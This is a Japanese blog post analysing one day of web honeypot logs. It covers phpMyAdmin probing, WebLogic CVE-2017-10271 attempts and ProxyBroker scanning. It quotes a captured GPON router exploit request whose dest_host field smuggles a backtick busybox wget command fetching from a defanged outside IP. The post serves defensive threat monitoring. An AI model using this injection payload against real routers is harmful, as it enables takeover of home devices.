WOWHoneypotの簡易分析(6日目)
WOWhoneypotの2018/6/9(土)(運用6日目)の簡易分析です。
総アクセス数は168件でした。
うちこれまでにも来ていたものは、以下です。
- トップページへのアクセス:42件
- PhpMyAdminに関する調査行為:121件
- Welogicの脆弱性(CVE-2017-10271)を狙った攻撃:2件
Weblogicのものは、取得先URlがそれぞれ異なり、以下でした。
新たに見たものを以下、見ていきます。
GET hxxp://db.speedup[.]gdn/echo.php
User-Agent: PxBroker/0.3.1/3923
特徴的なUser-Agentのため、そこで調査したところ以下のGithubが見つかりました。
https://github.com/constverum/ProxyBroke
どうやら、公開プロキシを探すオープンソースのツールのようです。これによるスキャン行為かと思われます。
パスに入る部分に書かれていたURLを調査しましたが、恐らくは見つかった場合にログとして残すためのコールバック先と思われます。
次。以前にも見かけたものです。
こちらは特徴的なものは特に見つけられませんでした。通信先はHAで調べてみました。
確証はありませんが、ひとつ前のものと同じかもしれません。
次。これは特徴がわかりやすいものでした。
GET /GponFrom/diag_Form?images/
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox wet -q0 hxxp://128.199.251[.]119/gpon.php?port=80`
家庭用GPONルータの任意のコード実行の脆弱性を狙ったものと思われます。
家庭用 GPON ルータの脆弱性を狙う「Mirai」の亜種、メキシコ発のネットワークスキャン活動で確認 | トレンドマイクロ セキュリティブログ
こちらのハニーポッターの方と同様のログを確認しています。
取得しにいくファイルですが、これも他と同様アクセスログを取得しているだけと推測しています。アクセスログがあった場合には、個別で攻撃を行うものと思われます。
ハンティングログに残っていたものは、GPONのもののみでした。
前日まで来ていたものは来ていなかったです。